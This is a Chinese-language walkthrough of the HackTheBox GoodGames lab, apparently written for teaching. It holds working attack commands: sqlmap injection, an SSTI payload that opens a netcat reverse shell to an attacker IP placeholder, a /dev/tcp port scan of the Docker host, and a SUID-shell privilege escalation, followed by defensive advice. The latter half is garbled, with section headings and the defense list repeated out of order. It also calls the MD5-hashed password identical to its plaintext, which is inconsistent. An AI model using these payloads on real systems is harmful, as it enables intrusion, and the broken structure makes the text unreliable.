HTB GoodGames 渗透测试详细教学文档<\/h1>

1. 初始信息收集<\/h2>

1.1 端口扫描<\/h3>

使用nmap进行基本扫描：<\/p>

nmap -sV <目标IP>
<\/span><\/span><\/code><\/pre>发现开放80端口（HTTP服务）<\/p>
1.2 Web应用初步分析<\/h3>
访问目标IP的80端口，发现一个登录页面，可能存在SQL注入漏洞<\/p>
2. SQL注入攻击<\/h2>
2.1 使用sqlmap检测注入点<\/h3>
sqlmap -u "http:\/\/<目标IP>\/login"<\/span> --data=<\/span>"username=admin&password=123"<\/span> --level=<\/span>5<\/span> --risk=<\/span>3<\/span>
<\/span><\/span><\/code><\/pre>2.2 获取数据库信息<\/h3>
sqlmap -u "http:\/\/<目标IP>\/login"<\/span> --data=<\/span>"username=admin&password=123"<\/span> --dbs
<\/span><\/span><\/code><\/pre>2.3 获取管理员凭据<\/h3>
通过注入获取到管理员账户：<\/p>
用户名：admin@goodgames.htb
密码：superadministrator (MD5加密)
<\/code><\/pre>
使用MD5解密工具解密后得到明文密码：superadministrator<\/code><\/p>
3. 登录系统并发现新功能<\/h2>
3.1 使用获取的凭据登录<\/h3>
用户名：admin@goodgames.htb
密码：superadministrator
<\/code><\/pre>
3.2 发现新URL<\/h3>
登录后在设置页面发现新的内部URL，需要将其添加到hosts文件：<\/p>
echo "<目标IP> internal-admin.goodgames.htb"<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>4. Flask后台分析<\/h2>
4.1 访问新发现的URL<\/h3>
访问internal-admin.goodgames.htb<\/code>，发现是一个Flask后台管理系统<\/p>
4.2 测试SSTI漏洞<\/h3>
在用户名修改处测试模板注入：<\/p>
{{7*7}}
<\/code><\/pre>
如果返回49，则确认存在服务器端模板注入(SSTI)漏洞<\/p>
5. 利用SSTI获取反弹shell<\/h2>
5.1 构造反弹shell payload<\/h3>
使用以下Python代码生成反弹shell：<\/p>
{{ ''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[414<\/span>]('rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc <攻击者IP> <端口> >\/tmp\/f'<\/span>,shell=<\/span>True<\/span>) }}
<\/span><\/span><\/code><\/pre>5.2 设置监听<\/h3>
在攻击机上：<\/p>
nc -lvnp <端口>
<\/span><\/span><\/code><\/pre>6. 容器内信息收集<\/h2>
6.1 确认处于Docker环境<\/h3>
ls \/ | grep dockerenv
<\/span><\/span>cat \/proc\/1\/cgroup
<\/span><\/span><\/code><\/pre>6.2 发现挂载目录<\/h3>
mount
<\/span><\/span><\/code><\/pre>发现\/home\/augustus<\/code>目录是从宿主机挂载的<\/p>
6.3 网络信息收集<\/h3>
ifconfig
<\/span><\/span><\/code><\/pre>发现Docker网络信息，推测宿主机IP可能是172.19.0.1<\/code><\/p>
7. 端口扫描宿主机<\/h2>
7.1 升级终端<\/h3>
python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre>7.2 扫描宿主机端口<\/h3>
for<\/span> PORT in {<\/span>0..1000}<\/span>; do<\/span> 
<\/span><\/span>  timeout 1<\/span> bash -c "<\/dev\/tcp\/172.19.0.1\/<\/span>$PORT &>\/dev\/null"<\/span> 2>\/dev\/null &&<\/span> echo "port <\/span>$PORT is open"<\/span>; 
<\/span><\/span>done<\/span>
<\/span><\/span><\/code><\/pre>发现22端口开放<\/p>
8. SSH连接宿主机<\/h2>
8.1 尝试SSH连接<\/h3>
ssh augustus@172.19.0.1
<\/span><\/span><\/code><\/pre>使用之前发现的用户名augustus<\/code>，尝试弱密码或之前发现的密码<\/p>
9. 权限提升<\/h2>
9.1 确认文件一致性<\/h3>
ls -alh \/home\/augustus
<\/span><\/span><\/code><\/pre>发现与容器内看到的文件一致<\/p>
9.2 创建SUID shell<\/h3>
在容器内（root权限）：<\/p>
cp \/bin\/sh \/home\/augustus\/
<\/span><\/span>chmod 4755<\/span> \/home\/augustus\/sh
<\/span><\/span><\/code><\/pre>在宿主机上：<\/p>
\/home\/augustus\/sh -p
<\/span><\/span><\/code><\/pre>获得root权限shell<\/p>
10. 总结攻击路径<\/h2>

发现SQL注入漏洞 → 获取管理员凭据<\/li>
登录系统 → 发现内部管理后台<\/li>
发现SSTI漏洞 → 获取容器内root权限<\/li>
利用挂载目录 → 逃逸到宿主机<\/li>
利用共享文件 → 提升宿主机权限<\/li>
<\/ol>
防御建议<\/h2>

使用参数化查询防止SQL注入<\/li>
对用户输入进行严格过滤，防止SSTI<\/li>
避免在Docker容器中使用root权限<\/li>
谨慎处理容器挂载目录权限<\/li>
使用强密码策略<\/li>
限制内部服务的网络暴露<\/li>
<\/ol>

HTB GoodGames 渗透测试详细教学文档<\/h1>

1. 初始信息收集<\/h2>

1.2 Web应用初步分析<\/h3> 访问目标IP的80端口，发现一个登录页面，可能存在SQL注入漏洞<\/p>

2. SQL注入攻击<\/h2>

4. Flask后台分析<\/h2>

4.1 访问新发现的URL<\/h3> 访问internal-admin.goodgames.htb<\/code>，发现是一个Flask后台管理系统<\/p>

5. 利用SSTI获取反弹shell<\/h2>

6. 容器内信息收集<\/h2>

8. SSH连接宿主机<\/h2>

防御建议<\/h2> 使用参数化查询防止SQL注入<\/li> 对用户输入进行严格过滤，防止SSTI<\/li> 避免在Docker容器中使用root权限<\/li> 谨慎处理容器挂载目录权限<\/li> 使用强密码策略<\/li> 限制内部服务的网络暴露<\/li> <\/ol>

1.2 Web应用初步分析<\/h3>
访问目标IP的80端口，发现一个登录页面，可能存在SQL注入漏洞<\/p>

4.1 访问新发现的URL<\/h3>
访问`internal-admin.goodgames.htb<\/code>，发现是一个Flask后台管理系统<\/p>`

防御建议<\/h2>

使用参数化查询防止SQL注入<\/li>
对用户输入进行严格过滤，防止SSTI<\/li>
避免在Docker容器中使用root权限<\/li>
谨慎处理容器挂载目录权限<\/li>
使用强密码策略<\/li>
限制内部服务的网络暴露<\/li> <\/ol>